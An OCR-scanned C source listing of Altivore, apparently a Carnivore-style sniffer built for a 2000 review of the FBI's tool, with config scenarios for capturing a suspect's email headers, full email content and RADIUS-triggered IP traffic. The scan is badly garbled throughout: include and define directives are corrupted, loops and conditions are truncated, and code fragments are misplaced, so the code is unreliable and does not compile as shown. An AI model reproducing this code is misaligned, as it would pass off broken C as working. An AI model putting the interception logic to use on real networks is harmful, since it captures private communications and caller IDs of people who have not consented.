Note: libpcap broken on RedHat 6.2 
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This module was written to match the FBI's solicitation for 
indepedent technical review of Carnivore that was published on 
August 25, 2000. Attachment 1 of that document describes several 
scenarios for Carnivore usage. 

Throughout this document, the term "Alice" refers to the criminal 
suspect whose email is being monitored. The term "Bob" refers to 
the person Alice is communicating with. The sections below can be 
copied/pasted into the file "altivore.ini", which this program uses 
to store its configuration Information. 

[1.1 email header pen-register] 

; Monitors ali the email headers to and from Alice 's 

/account. This does not capture the "Subject:" field, 

; which is considered by courts to be part of the "data" 

; rather than the "cali records" . This should be 

;deployed on or near the email server that processes 

;Alice's mail. 

mode = email-headers 

email . address = alice@example.com 

logfile = alice .txt 

[1.2 HTTP pen-register from dial-up user] 

; Monitors the IP address of web-sites the user visits. 
;A complication in this is that the user dials—up and 
; receives a unique IP address each time. We monitor 
;the dial-up password protocol known as "RADIUS" in 
; order to trigger when Alice logs on and in order to 
; find out what IP address she is using. This should be 
;deployed on a segment behind the bank of dialup servers 
; as well as where it can sniff the RADIUS packets . This 
;version of Carnivore only monitors Accounting packets; 
;you may have to enable this feature in order to get 
;this to work right . 
mode = server-access 
radius . account = alice@example . com 
server, port = 80 
logfile = alice. csv 

[1.3 FTP pen-register from dial-up user] 

; Same as above, but monitors FTP instead of HTTP. 

mode = server-access 

radius . account = alice@example.com 

server .port = 80 

logfile = alice. csv 

[2.1 email content—wiretap] 

; Instead of capturing just the headers, this scenario 

; captures the full contents of the email 

mode = email— content 

email . address = alice@example.com 

tracefile = alice. tcp 

[2.2 email content—wiretap] 

/Captures the full content to/from a speci fic IP 

/address. This is the same as running the freeware 

/product called TCPDUMP . Example: 

; tcpdump -w tracefile . tcp host 192.0.2.189 

mode = ip— content 

ip. address = 192 .0 .2 .189 

tracefile = alice. tcp 



DESIGN 

No reassembly/reordering 

This software does not support IP fragmentation or TCP segment 
reordering. As a result, it may miss some emails or accidentally 
include segments from other people ' s emails. This is a cruciai 
area of discussion; fragmentation issues are an important flaw 
in many products, and is likely a flaw of Carnivore as well . 

Little SMTP server state 

Altivore only monitors a little bit of SMTP server state (it is 
impossible to fully support SMTP state without reassembly and 
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email not belonging to Alice (the suspect) . For example, if the 
system is unable to determine when an email message ends, it may 
accidentally capture subsequent emails transfered across the same 
SMTP connection. It is believed that this is a problem with the 
FBI ' s Carnivore as well. 

RADIUS incomplete 

This RADIUS parsing code has only been tested at a few ISPs. This 
is a concern in some deployments because it won't work. One way 
arround this is to force RADIUS Accounting during deployment . 
More work on RADIUS decoding needs to be done with Altivore. 

Evidence Authentication 

Evidence handling is a big concern. Altivore and Carnivore really 
should support MD5, PGP, or X. 509 private-key signing in order to 
fvtlly authenticate files. This would detect later unauthorized 
tampering of the evidence. 

ALTIVORE VS. NETWORK ICE 

Network ICE is a leading software vendor of products similar to 
this technology. The "sniff" network traffic looking for signs of 
hacker activity in order to protect customer networks. Our primary 
competitive advantages are our stateful protocol decoding features 
and high—speed sniffing. This means we can monitor gigabit networks 
with full packet reassembly and application protocol state. 

In contrast, Carnivore was probably written using many of the same 
short— cuts that our competitors have taken. We've written Altivore 
using similar short— cuts in order to demonstrate the problems with 
this approach. We've included a small amount of state in order to 
show why stateful inspection is needed in this class of products . 

*/ 

iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 
iinclude 

/* Links to the libpcap library, standard library on Windows and 

* UNIX for sniffing. */ 
iinclude 



idefine HASHENTRIES 1024 
idefine ADD_IF_NOT_FOUND 1 
idefine IGNORE_IF_NOT_FOUND 0 
idefine TCP_TO_SERVER 0x100 
idefine TCP FROM_ SERVER 0x000 

/** Maximum length of an email address . Portions of the address 

* longer than this length are ignored. */ 
idefine MAX_ADDRESS_LENGTH 1024 

/** Maximum number of recipients . More recipients than this are 

* ignored. */ 

idefine MAX^RECIPIENTS 100 

iundef TRUE 
idefine TRUE 1 
iundef FALSE 
idefine FALSE 0 

/** For pretty printing IP addresses */ 
idefine _XIP(a,n) (int) ( ( (a) » (n)) SOxFF) 

idefine P_IP_ADDR(a) _XIP(a,24) , _XIP (a, 16) , _XIP (a, 8) , _XIP(a,0) 
/** 

* TCP/IP protocol extraction stuff. 
*/ 

idefine ex8 (p, f) ( (p) [f] ) 

idefine exl6(p,f) ( (p) [f] « 8 / (p)[f+l]) 
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idefine IP_SIZEOF_HDR (p, f) 

idefine IP_TOTALLENGTH (p, f) 

idefine IP_PROTOCOL (p, f) 

idefine IP_SRC(p, f) 

idefine IP_DST(p, f) 

idefine TCP_SRC(p,f) 

idefine TCP_DST(p,f) 

idefine TCP__SEQNO (p, f) 

idefine TCP_ACKNO (p, f) 

idefine TCP_FLAGS (p, f) 

idefine TCP_SIZEOF_HDR (p, f) 

idefine TCP_FIN 

idefine TCP^SYN 

idefine TCP_RST 



((ex8(p,f+0) & OxOF) * 4) 
exl 6 (p, f+2) 
ex8 (p, f+9) 

ex32 (p, f+12) 
ex32(p,f+16) 
exl 6 (p, f+0) 
exl 6 (p, f+2) 
ex32(p,f+4) 
ex32 (p, f+8) 
(ex8 (p, f+13) &0x3F) 
(((ex8(p,f+12)»4) & 0x0f)*4) 
1 
2 
4 



idefine FREE(x) if (x) free(x) 
/** 

* A utility function for assigning strings. It solves several 

* string handling issues, such as copying over "counted strings" 

* rather than NUL-terminated strings. 
*/ 

static void 

set St ring (char **r_str, const void *vstr, int offset, int len) 
{ 

const char *str = vstr; /*kludge: avoid warnings*/ 
if (*r_str) 

free (*r_str) ; 
if (str == NULL) { 

*r_str = NULL; 

return; 

} 

if (len == -1) 

len = strlen ( (const char*) str); 
*r_str = (char*) malloc (len+1) ; 
memcpy (*r_str, str+offset, len); 
(*r_str) [len] = '\0' ; 

} 

/** Case— insensitive memcmpO */ 
static int 

memcasecmp (const void *lhs, const void *rhs, int length) 
{ 

int i; 

for (i=0; i< len) 

len = strlen (rhs) ; 
return memcmp (lhs, rhs, len) == 0; 



* Encapsulates the idea of an array of nul terminated strings. Use 

* straXXXX() functions. 
*/ 

struct stringarray { 
char **str; 
int length; 
int max; 

}; 

typedef struct stringarray stringarray; 



/** stringarray . straAddElement () 
* Appends a string onto the end of an array of strings. 
*/ 

void 

straAddElement (stringarray *lhs, const char rhs[]) 
{ 

if (lhs->length + 1 >= lhs->max) { 
int newmax = lhs—>max * 2 + 1; 

char **ne« _array = (char**) malloc (sizeof (char*) * (new_max) ) ; 
if (lhs->str) { 

memcpy ( nevr_array, 
lhs->str, 

sizeof (new_array [ 0 ] ) *lhs->length) ; 
free (lhs->str) ; 
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lhs->str = newarray; 
lhs—>max = new max; 

} 

lhs->str [lhs->length] = strdup (rhs) ; 
lhs->length++; 

ì 



* These are the several modes that Carnivore/Altivore can run as. 

* See the explanation above for more information on how to 

* configure these modes. 
*/ 

eri um { 

/** Capture the headers of email to a text file */ 
modeemail_headers = 1, 

/** Capture just the addresses to/from Alice */ 
mode_email_addresses , 

/** Record accesses to servers with a specific TCP port . */ 
mode_server_access , 

/** Record the full email content for Alice's email*/ 
mode_email_content , 

/** Record a full sniffer trace for the indicated 

* IP address. */ 
mode_ip_content 

}; 

idefine MODE(carn, m) ( (carn)—>mode == m) 

static const char *modeNames[] = { "unspecified" , "email-headers" , 
"email-addresses" , "server-access", "email-content" , 
"ip-content ", 0} ; 

int 

par seMode (const char modeName[]) 
{ 

int i; 

for (i=0; modeNames [i] ; i++) { 

if (strcmp (modeName, modeNames [i] ) == 0) 
return i; 

} 

return 0; 

} 

struct intlist { 
int list [32]; 
int count; 

}; 

typedef struct intlist intlist; 
/** 

* The root object for the Carnivore system. 
*/ 

struct Carnivore 
{ 

/** What mode of operation we are in */ 
int mode; 

/** The name of the sniffer compatible tracefile that data will 

* be copied to (when doing full— content wiretaps) . */ 
char *tracefile; 

FILE *fp_trace; 

/** Logfile for text information. */ 
char *logfile; 

/** A list of IP addresses to filter for. This is used when a 

* court order specifies IP addresses . TODO: allow ranges and 

* more IP addresses . */ 
intlist ip; 

/** Contains a list of ports that we will use in order to 

* monitor when a certain type of server has been accessed. 
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intlist port; 

/** TCP/IP connection table for maintaining session state*/ 
struct TcpCnxn *cxTable [HASH^ENTRIES] ; 
int cxld; 

/** Whether or not we should save the last frame to a file */ 
int do_filter; 

/** Whether or not we should remove this connection from 

* our list . */ 
int do_remove; 

/** A list of email addresses . We compare these addresses to 

* emails as they go by in order to determine if we need to 

* make a copy. */ 
stringarray email_addresses; 

/** A list of RADIUS account names that we should monitor 

* when doing IP wiretaps . */ 
stringarray radius__accounts; 

/** An array of trace files that we will read in order to test 

* the system. They must be in tcpdump/libpcap format. */ 
stringarray testinput ; 

/** An array of adapter names that we need to open in 

* promiscuous mode. */ 
stringarray interfaces ; 

}; 

typedef struct Carnivore Carnivore; 
/** 

* Test to see if either the source or destination IP address is 

* being filtered for. If we are filtering for this IP address, 

* then we'll likely save it to a file. Note that we are doing a 

* linear search through the array on the assumption that we are 

* filtering only a few IP addresses, often just a single one. 
*/ 

int 

has_integer (intlist *ip, int ipl, int ip2) 
{ 

int i; 

for (i=0; icount; i++) { 

if (ip->list [i] == ipl II ip->list [i] == ip2) 
return 1; 

} 

return 0; 



/** Adds the speci fied IP address to the list of addresses that we 

* are filtering for. This may be a configured IP address or one 

* that is auto-configured by the RADIUS parsing. */ 
void 

add_integer (intlist *ip, int ip_address) 
{ 

if (ip_address == 0) 

return; /*ignore empty IP addresses*/ 
if (has^integer (ip, ip^address, ip address) ) 

return; /*ignore duplicates*/ 
if (ip—>count < sizeof (ip—>list) /sizeof (int) ) { 

ip->list [ip->count] = ip_address; 

ip->count++ ; 

} 

} 

/** Delete an IP address from the list of filters . This is called 

* when the RADIUS parsing determines that the monitored user has 

* hung up. */ 
void 

del_integer (intlist *ip, int ip_address) 
{ 

int i; 

for (i=0; icount; i++) { 

if (ip->list [i] == ip_address) { 

memmove (ip—>list+i, ip—>list+i+l , 
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ip->count- 



/** matchName ( ) 

* Tests to see if the desired email address should be filtered 

* for. This is presumably the email address of somebody that we 

* have a court— order to monitor. 
*/ 

int 

matchName (const char addr[], int addrlen, stringarray *list) 
{ 

int i; 

if (addr == NULL) 

return 0; 
for (i=0; ilength; i++) { 

int lhs len = strlen(list—>str[i]); 
if (list->str[i] [0] == '*') { 

/*match end of string, e.g. allow specification of 

* "*@suspect . com" to match any emails for a domain*/ 
if (addr_len >= lhs_len - 1) { 

const char *newlhs = list—>str[i]+l; 
const char *new addr = addr+addr_len—lhslen+l; 
if (memcasecmp (new lhs, new addr, lhs len-1) == 0) 
return TRUE; 

ì 

} 

else if (addr len == lhs len 

&& memcasecmp (list->str [i] , addr, addr_len) == 0) 
return TRUE; 

} 

return FALSE; 



/** 

* A TCP connection entry. We maintain one of these for every 

* outstanding connection that we might be tracking. This contains 

* the basic TCP info, as well as some higher level protocol info 

* for SMTP. 
*/ 

struct TcpCnxn 
{ 

/** Each new connection is identified with a unique ID */ 

int msg_id; 

int server_ip; 

int client ip; 

int serverport; 

int client_port; 

int serverseqno ; 

int client_seqno; 

struct TcpCnxn *next; 

timet creation_time ; 

char *sender; 

int sender matches ; 

char *recipient ; 

stringarray recipients ; 

/** Whether or not we should save the email message for this 

* connection. */ 
int do_filter; 

/** Whether we should filter this one f rame . We need this in 

* order to capture the trailing dot that ends an email message. 
*/ 

int filter one_f rame; 

/** Whether or not we should remove this connection entry at 

* the next opportunity . */ 
int do_remove; 

/** Whether we are parsing the ' envelope ' or the message 

* itself. */ 
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}; 

typedef struct TcpCnxn TcpCnxn; 



* Create a hash entry for our table. The hash entry is based 

* only on the IP addresses and port numbers . The exact 

* hash algorithm is unimportant , and should be adjusted over 

* time to produce the best results. Note that since we've 

* already converted the (src,dst) to (srvr,clnt), we don't 

* need to make the hash symmetric. 
*/ 

int 

cxHash (TcpCnxn *cx) 
{ 

int result = 0; 

result = abs ( (cx->server_ip A (cx->client_ip*2) ) 

A ( ( cx->server_port <client_port ) ) ; 
return result % HASH_ENTRIES ; 



/** 

* Compares two connection objects in order to see if they are the 

* same one. Only IP address and TCP port info is used in this 

* comparison. 
*/ 

int 

cxEquals (TcpCnxn *lhs, TcpCnxn *rhs) 
{ 

if (lhs—>server_ip != rhs—>server_ip) 
return 0; 

if (lhs->client_ip != rhs—>clientip) 
return 0; 

if (lhs—>server port != rhs—>server port) 
return 0; 

if (lhs—>client port != rhs->client port) 

return 0; 
return 1; 

} 



/** 

* Looks up a TCP connection object within our table. If not found, 

* it may add it (depending upon a parameter) . 

* Qparam carn 

* This object. 

* @param rhs 

* A copy of the connection object we are looking up (we simply 

* pulì out the address/ports front this to compare them) . 

* Qparam add if_not_found 

* Whether we should add a new connection object if we cannot 

* find an existing one. It is important that we only add 

* connection objects during a SYN/SYN-ACK in order to avoid 

* accidentally getting state in the middle of the connection . 
*/ 

TcpCnxn * 

cxLookup (Carnivore *carn, TcpCnxn *rhs, int add_if_not_found) 
{ 

int h = cxHash (rhs) ; 

TcpCnxn **r_cx = Scarn->cxTable [h] ; 

for (;;) { 

if (*r_cx == NULL) ( 

/* The connection object wasn 't found. If this was 

* a SYN or SYN—ACK, then we ' 11 need to add this 

* connection. */ 

if (add_if_not found) { 

*r cx = (TcpCnxn* ) malloc (sizeof (TcpCnxn) ) ; 
memset ( *r_cx, 0, sizeof (**r_cx) ) ; 
( *r_cx) — >server_ip = rhs—>server_ip; 
(*r_cx) —>client_ip = rhs—>client_ip; 
(*r_cx) —>server_port = rhs—>server_port; 
(*r_cx)—>clientport = rhs—>client_port; 
(*r_cx) —>server seqno = rhs—>server_seqno; 
(*r_cx) —>client segno = rhs—>client segno; 
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return *r_cx; 

} 

if (cxEquals (*r_cx, rhs) ) 
return *r_cx; 

else 

rcx = & ( *r ex)— >next; 

} 

} 



/** 

* Reset s the SMTP protocol info back to a known state. It is 

* important that this be as delicate as possible: it should reset 

* data at the slightest provocation in order to avoid accidentally 

* capturing somebody else's email. 
*/ 

void 

cxResetMsg (TcpCnxn *cx) 
{ 

cx—>do_filter = FALSE; /*don't capture these emails*/ 
if (cx->sender) { 

free ( cx->sender) ; 

cx—>sender = NULL; 

} 

cx—>sendermatches = FALSE; 
if (cx->recipients . length) { 
int i; 

for (i=0; irecipients . length; i++) 

free (cx->recipients . str[i]) ; 
free (cx->recipients . str) ; 
cx—>recipients.str = NULL; 

memset (&cx->recipients, 0, sizeof (cx->recipients) ) ; 

} 

} 



/** 

* Removes a TCP connection object from our table. This is called 

* whenever we reach the end of SMTP processing, the TCP connection 

* closes, or when we timeout and clean up a connection. 
*/ 

void 

cxRemove (Carnivore *carn, TcpCnxn *rhs) 
{ 

int h = cxHash (rhs) ; 

TcpCnxn **r_cx = Scarn->cxTable [h] ; 

for (;;) ( 

if (*r_cx == NULL) 

break; /*not found*/ 
else if (cxEquals (*r ex, rhs)) { 

TcpCnxn *cx = *r_cx; 

*rcx = cx—>next; 

cxResetMsg ( ex) ; 

free ( ex) ; 

break; 

} 

else 

r ex = S ( *r_cx ) ->next ; 

} 

} 



/** Writes a little— endian integer to the buffer */ 
void 

writeint (unsigned char hdr[], int offset, int x) 
{ 

hdr[offset+0] = (unsigned char) (x»0) ; 
hdr[offset+l] = (unsigned char) (x»8) ; 
hdr[offset+2] = (unsigned char) (x»16) ; 
hdr[offset+3] = (unsigned char) (x»24) ; 

} 
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* that I could use the built-in llbpcap file saving mechanism 

* but I want to eventually at digital-signatures, so I'il be 

* doing strange stuff with the file in the future. 
*/ 

void 

carnSavePacket (Carnivore *carn, const unsigned char buf[], 
int orig_len, time_t timestamp, int usecs) 

{ 

unsigned char hdr[16]; 
int snaplen = origlen; 

/* fife vere triggered to save the frame, now turn this off. 

* The SMTP state engine will have to revalidate the next 

* packet in order to make sure we should be saving it . */ 
carn->do_filter = FALSE; 

/* Exit from this function (without saving content) if we 

* are not running in the appropriate mode. */ 
switch (carn—>mode) { 

case mode_email_content : 
case mode_ip_content : 

break; 
default : 

return; 

} 

if (carn->tracefile == NULL) 
return; /*no filename*/ 

/*Open the tracefile if need be*/ 
if (carn->fp_trace == NULL) { 
struct stat s = {0}; 

if (stat (carn->tracefile, Ss) == 0) { 

/*Ooops, it already exists . Maybe we crashed before? 

* fife should not put the header on the file if it 

* already exists */ 

carn->fp_trace = f open (carn->trace file, "a+b") ; 
} else { 

/*Create a new one . */ 

carn->fp_trace = f open (carn->trace file, "wb") ; 
if (carn->fp_trace) { 

/*create a file header*/ 
static const char *foo = 

" \xD4 \xC3 \xB2 \xAl " /*MAG1C*/ 
"\x02\x00\x04\x00" /*maj or /minor version*/ 
"\xOO\xOO\xOO\xOO" /*this timezone (GMT) */ 
"\xOO\xOO\xOO\xOO" /*sig figs */ 
"\xDC\x05\x00\x00" /*snap length*/ 
"\x01\x00\x00\x00"; /*link type*/ 
if (fwrite (foo, 1, 24, carn->fp_trace) '. = 24) { 
int xxx = ermo; 
foiose (carn->fp_trace) ; 
carn— >fp trace = NULL; 
ermo = xxx; 

} 

} 

) 

if (carn->fp_trace == NULL) { 
perror (carn—>tracefile) ; 
return; 

) 

} 

/* Write the frame to the file */ 

writeint (hdr, 0, ( (int) timestamp) ) ; 

writeint (hdr, 4, usecs); /*microseconds*/ 

writeint (hdr, 8, snap_len) ; /*snapped size of frame*/ 

writeint (hdr , 12, orig len) ; /*original size of frame*/ 

fwrite (hdr, 1, 16, carn—>fp_trace) ; 
fwrite (buf, 1, snap_len, carn->fp_trace) ; 

} 



* Prints some text to the logflle. 

*/ 
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logprint (Carnivore *carn, const char fmt[], ...) 
{ 

FILE *fp; 

struct stat s = {0}; 
va_list marker; 

if (carn->logfile == NULL) 
return; 

if (stat (carn->logf ile, Ss) == 
fp = fopen (carn->logfile, 

else 

fp = fopen (carn->logf ile, 
if (fp == NULL) { 

perror (carn->logfile) ; 
return; 

} 

va_start (marker, fmt) ; 
vfprintf (fp, fmt, marker) ; 
va_end (marker) ; 

foiose (fp) ; 

} 

/** 

* For logging purposes , we frequently need to grab the current 

* time. This function formats the current GMT time in ISO 

* format . BUG: the time should really be retrieved from the 

* packet, not the system time (in case we read from tracefiles 

* rather the live network) . 
*/ 

void 

formatNow (char tbuf[], int sizeof^tbuf) 
{ 

time_t now = time(O); 

struct tm *tmptr = gmtime (&now) ; /*must be GMT*/ 
if (tmptr == NULL) 

strcpy ( tbuf, "err ") ; 

else 

strf time (tbuf , sizeof_tbuf, "%Y-%m-%d %H:%M:%S", tmptr); 

} 

/** 

* This function captures just the email addresses . 
*/ 

void 

carnPenEmail (Carnivore *carn, const char sender[], 

const unsigned char rcpt[], int offset, int length) 

{ 

char tbuf [64] ; 

if (!MODE(carn, mode email addresses) ) 

return; /*not recording email addresses*/ 

if (carn->logfile == NULL) 

return; /*no logfile specified by user*/ 

if (sender == NULL) 

sender = " (nul) " ; 

/*format time: eg. 2000-08-24 08:23:59*/ 
formatNow (tbuf , sizeof(tbuf)); 

logprint (carn, "%s, %s, %.*s\n" / tbuf, sender, 

length, rcpt+offset) ; 

printf("%s, %s, %.*s\ti" / tbuf, sender, 

length, rcpt+offset) ; 

} 



enum ( 

parsing_envelope, parsing__message 

}; 



0) 

"a"); 
"w") ; 
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/** 

* Tests to see if the TCP packet data starts with the specified 

* command . 
*/ 

int 

SMTP_COMMAND (const unsigned char buf[], int offset, 

int maxoffset, const char cmd[]) 

{ 

int cmd length = strlen (cmd) ; 

int line_length = max_offset—offset; 

if (line length < cmd length) 

return FALSE; 
if (memcasecmp (buf+offset, cmd, cmd_length) != 0) 

return FALSE; 
offset += cmd_length; 

/*TODO: test for some boundary conditions*/ 
return TRUE; 

ì 

/** 

* Tests to see if the email body contains a dot ' . ' on a blank 

* line by itself. 
*/ 

int 

SMTP_IS_DOT (const unsigned char buf[], int offset, int max^offset) 
{ 

int i; 

char last_char = '\0'; 

for (i=offset; i< max_offset 

&& (buf[i+l] == '\n' Il buf[i+l] = 
&& (last_char == '\n' Il last_char 
return TRUE; 

ì 

} 

last_char = c; 

} 

return FALSE; 

ì 



static const char *MAIL__FROM = "MAIL FROM: "; 
static const char *RCPT_TO = "RCPT TO: "; 



/** 

* Processes the email address in a RCPT TO: or MAIL FROM: 
*/ 
void 

match email (Carnivore *carn, const char *cmd, 

const unsigned char buf[], int offset, int max__offset, 

TcpCnxn *cx) 

{ 

int length = —1; 

int address__matched = FALSE; 



/* See if this starts with RCPT TO: or MAIL FROM:, and then 

* skip beyond it . */ 

if ( ! SMTPCOMMAND (buf, offset, max_offset, cmd)) 

return; 
offset += strlen (cmd); 

/* Skip beyond leading whitespace and the initial '<' character 

* (if they exist) . */ 
while (offset < max off set 

SS (isspace (buf [offset] ) Il buf [offset] == '<')) 
off Set++; 

/* Figure out how long the email address is */ 
for (length=0; offset+length< 0) 
return; 

if (MODE (carn, mode_email_addresses) SS cmd == MAIL_FROM ) { 
/* If W e are doing a pen-register style capturing of email 



= '\r') 
== '\r')) ( 
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* addresses, then save off the SOURCE email address. */ 
if (cx->sender) 

f ree ( cx->sender) ; 
cx->sender = (char*)malloc (length+1) ; 
memcpy (cx->sender, buf+offset, length) ; 
cx->sender [length] = '\0'; 

} 

/* See if the email addresses match */ 
if (matchName ( (char*) buf+offset, length, 

&carn->email_addresses) ) { 

cx->do_filter = TRUE; 
address_matched = TRUE; 

} 

if (cmd == MAIL_FROM) { 
if (address_matched) 

cx—>sendermatches = TRUE; 
} else if (cmd == RCPT_TO) { 

if (address_matched / / cx->sender_matches) 

carnPenEmail (carn, cx->sender, buf, offset, length); 

} 

} 

* Read the number of remaining characters in the line. 

*/ 

int 

readLine (const unsigned char buf[], int offset, int max_offset) 
{ 

int length = 0; 

while (offset + length < max_offset) { 
char c = buf[offset+length]; 
length++; 
if (c == '\n<) 
break; 

} 

return length; 

} 

/** 

* Examine the line from the packet in order to determine whether 

* it constitutes a legai RFC822 email header. We stop processing 

* data at the end of the headers. 
*/ 

int 

isEmailHeader (const unsigned char buf[], int offset, int max off set) 
{ 

int leading_space = 0; 
int saw_colon = 0; 

while (offset < max_offset SS isspace(buf[offset])) { 
off Set++; /*strip leading whitespace*/ 
leading_space++ ; 

} 

if (offset >= max__offset) 

return FALSE; /*empty lines are not a header*/ 

if (buf [offset] == '>') 
return FALSE; 

while (offset < max_offset) { 
if (buf [offset] == ':') 

saw_colon = TRUE; 
off Set++; 

} 

if (saw colon) 

return TRUE; 
if (leading__space) 

return TRUE; 
return FALSE; 

ì 
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/** 

* This function processes a single TCP segment sent by the client 

* to the SMTP server. 
*/ 

int 

sniffSmtp (Carnivore *carn, TcpCnxn *rhs, int tcp_flags, 

const unsigned char buf[], int offset, int max_offset) 

{ 

TcpCnxn *cx; 
int length; 

/* Lookup the TCP connection record to see if we are saving 

* packets on the indicated TCP connection . */ 
ex = cxLookup (carn, rhs, IGNORE_IF_NOT_FOUND) ; 

/* Process data within this TCP segment */ 
length = max^offset - offset; 
if (length > 0) { 

if (ex == NULL) { 

/* Add a record for this connection whenever we see a 

* an address in an envelope. */ 
if (SMTP_COMMAND (buf, offset, max_offset, "RCPT TO:")) 

ex = cxLookup (carn, rhs, ADD_IF_NOT_FOUND) ; 
if (SMTP_COMMAND(buf, offset, max_offset, "MAIL FROM: ") ) 
ex = cxLookup (carn, rhs, ADD_IF_NOT_FOUND) ; 

} 

if (ex != NULL) { 

switch (cx->state) { 
case parsing_envelope : 

match_email (carn, MAIL_FROM, 

buf, offset, max__offset, ex); 

match_email (carn, RCPT_TO, 

buf, offset, max_offset, ex) ; 

if (SMTP_COMMAND (buf, offset, max_offset, "DATA")) { 
if (cx—>do_filter) 

cx->state = parsing_jnessage; 

else 

cx->do remove = TRUE; 

} 

if (SMTP_COMMAND (buf, offset, max_offset, "QUIT")) 

cx->do remove = TRUE; 
if (SMTP_COMMAND (buf, offset, max_offset, "RSET") ) 

cx->do_ remove = TRUE; 
if (SMTP_COMMAND (buf, offset, max_offset, "ERST")) 

cx->do_ remove = TRUE; 
break; 
case parsing niessage : 

if (MODE (carn, mode email headers) ) { 

int i; 

char tbuf[64]; 

formatNow (tbuf , sizeof (tbuf) ) ; 

logprint (carn, " %08X->%08X %s \n", 

cx->client_ip, cx->server_ip , tbuf) ; 

/*Parse just the headers from the first packet*/ 
for (i=offset; i 8 ss 

startsWith ( (char*)buf+offset, "Subject : ") ) 
logprint (carn, "Subject: \n") ; 
else { 

/*Write line to log file*/ 

logprint (carn, "%.*s", len, buf+offset) ; 

} 

offset += len; 

} 

logprint (carn, " EOM \n ") ; 

cx->do_remove = TRUE; 
cx->do__filter = FALSE; 
carn->do_filter = FALSE; 

) 

if (SMTP_IS_DOT(buf, offset, max_offset) ) 

cx->do remove = TRUE; 
break; 
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if (ex) { 

if (cx—>do_filter) 

carn->do_filter = TRUE; 

if (cx—>filter_oneframe) { 
carn->do_filter = TRUE; 
cx—>filter_oneframe = FALSE; 

} 

if (cx—>do_remove 

II (tcp_flags S TCP^RST) Il (tcp_flags S TCP_FIN) ) 
cxRemove (carn, rhs) ; 

} 

return 0; 

} 



/** 

* RADIUS protocol information we parse out of a packet . In the 

* future versions of this software, we are going to need to 

* store these records over time; for now, we just parse the 

* protocol into this normalized structure . 
*/ 

struct RadiusRecord 
{ 

int radius_client; 

int radius_server; 

int nas_ip; 

int nas_port; 

int direction; 

int code; 

int xid; 

int status; 

char *user_name; 

char *caller_id; 

char *called_phone; 

char *session_id; 

int ip_address; 

int session_duration; 

}; 

typedef struct RadiusRecord RadiusRecord; 

/** Frees the allocated information */ 
void 

radFree (RadiusRecord *rad) 
{ 

FREE (rad->user_name) ; 
FREE (rad->caller_id) ; 
FREE (rad->called__phone) ; 
FREE (rad->session_id) ; 

ì 

/** 

* Process a single RADIUS command that we saw on the network. 

* For right now, we are primarily going to process radius 

* accounting packets, as these are the ones most likely to give 

* us solid information. 
*/ 

void 

radProcess (Carnivore *carn, RadiusRecord *rad) 
{ 

enum {account start=l, account stop=2 } ; 
if (rad—>code == 4 II rad—>code == 5) { 

/* ACCOUNTING packet : This packet contains an accounting 

* record. Accounting records will often contains IP address 

* assignments that normal authentication packets won't.*/ 
if (rad—>user name SS matchName (rad—>username, 

strlen (rad—>user__name) , Scarn—>radius accounts)) { 
/* Found Alice! Therefore, we going add add Alice ' s 
* IP address to the list of IP addresses currently 
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* packet, then we will delete the IP address from 

* our list . */ 

if (rad->status == account_start) 

add_integer (&carn->ip, rad->ip__address) ; 
else { 

/* Default: any unknown accounting message should 

* trigger us to stop capturing data. If we make a 

* mistake, we should err on the side of not 

* collecting data. */ 

del_integer (Scarn->ip, rad->ip_address) ; 

ì 

carn->do_filter = TRUE; /*capture this packet*/ 

ì 

/* Double-check : Look to see if the IP address belongs to 

* another persoti . */ 
else if (has_integer (Scarn->ip, rad->ip_address, 0) ) { 

/* The names did not match, yet we have seen some sort 

* of packet dealing with the account that we are 

* monitoring. This is bad — it indicates that we might 

* have dropped a packet somewhere. Therefore, we are 

* going to immediately drop this packet . */ 
del_integer (&carn->ip, rad->ip_address) ; 
carn->do_filter = TRUE; /*capture this packet*/ 

} 

} 

} 



/** 

* This function sniffs RADIUS packets off the network, then passes 

* the processed RADIUS Information to another function that 

* deals with the content . 
*/ 

int 

sniffRadius (Carnivore *carn, int ip_src, int ip dst, 

const unsigned char buf[], int offset, int max_offset) 

{ 

RadiusRecord recx = {0}; 

RadiusRecord *rad = Srecx; 

const static int minimum length = 20; 

int code; 

int xid; 

int radius_length ; 
int i; 

if (carn->radius_accounts . length == 0) 
return 0; /*not scanning radius*/ 

if (max_offset — offset <= minimum_length) 
return 0; /*corrupt* / 

/* Parse the RADIUS header info and verify */ 
code = ex8 (buf, offset+0) ; 
if (code < 1 1 1 code > 5) 

return 0; /*unknown command/operationg*/ 
xid = ex8(buf, off set +1) ; 
radius_length = exl6(buf, offset+2) ; 
if (offset + radius__length > max_offset) 

return 0; /*packet corrupt*/ 
else if (offset + radius length < minimum_length) 

return 0; /*packet corrupt*/ 
else if (max_offset > offset + radius_length) 

max_offset = offset + radius^length ; /*ignore padding*/ 

/* Verify the attributes field */ 
for (i=offset+minimum length; i max^offset) 
return 0; 
i += len; 

} 



/* Grab the IP addresses of the client (the Network Access 

* Server like Livingston) and the RADIUS authentication 

* server . */ 
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rad->radlus_client = ip_src; 

rad->radius_server = ip_dst; 
} else { 

rad->radius_client = ip_dst; 

rad->radius_server = ip_src; 

} 

rad->code = code; 
rad—>xid = xid; 



/* Parse the attributes fleld */ 
for (i=offset+minimumlength; i max off set) 
break; 

i += len; 

len -= 2; 



switch (type) { 

case 1: /*User—Name*/ 

/*Lots of names appear to have a trailing nul that we 

*should strip from the end of the name . */ 
if (len > 1 SS buf[data_offset+len-l] == '\0') 
len — ; 

setString (&rad->user_name, buf, data_offset, len) ; 
break; 

case 2: /*User-Password*/ 
break; 

case 4: /*NAS-IP-Address*/ 

rad->nas_ip = ex32 (buf , datalo ff set) ; 

break; 
case 5: /*NAS-Port*/ 

rad->nas_port = ex32 (buf, data_offset) ; 

break; 

case 8: /*Framed-IP-Address*/ 

rad->ip_address = ex32(buf,data__offset); 
break; 

case 19: /*Callback-Number*/ 
case 20: /*Callback-Id*/ 

/*TODO: sounds like something we might want to record*/ 

break; 

case 30: /*Called-Station-Id*/ 

/*Find out the phone number of the NAS. This could be 

*important in cases where the evidence will later be 

*correlated with phone records.*/ 
setString (&rad->called_phone, buf, data__offset, len); 
break; 

case 31 : /*Calling-Station-Id* / 

/*True "trap-and-trace" ! Assuming that caller-id is 

*enabled, this will reveal the phone number of the 

*person dialing in.*/ 
setString (&rad->caller_id, buf, data^offset, len) ; 
break; 

case 40: /*Acct-Status-Type*/ 

/*When scanning accounting packets, this is criticai in 
*order to be able to detect when the service starts and 
*stops . */ 

rad->status = ex32 (buf , data^offset) ; 
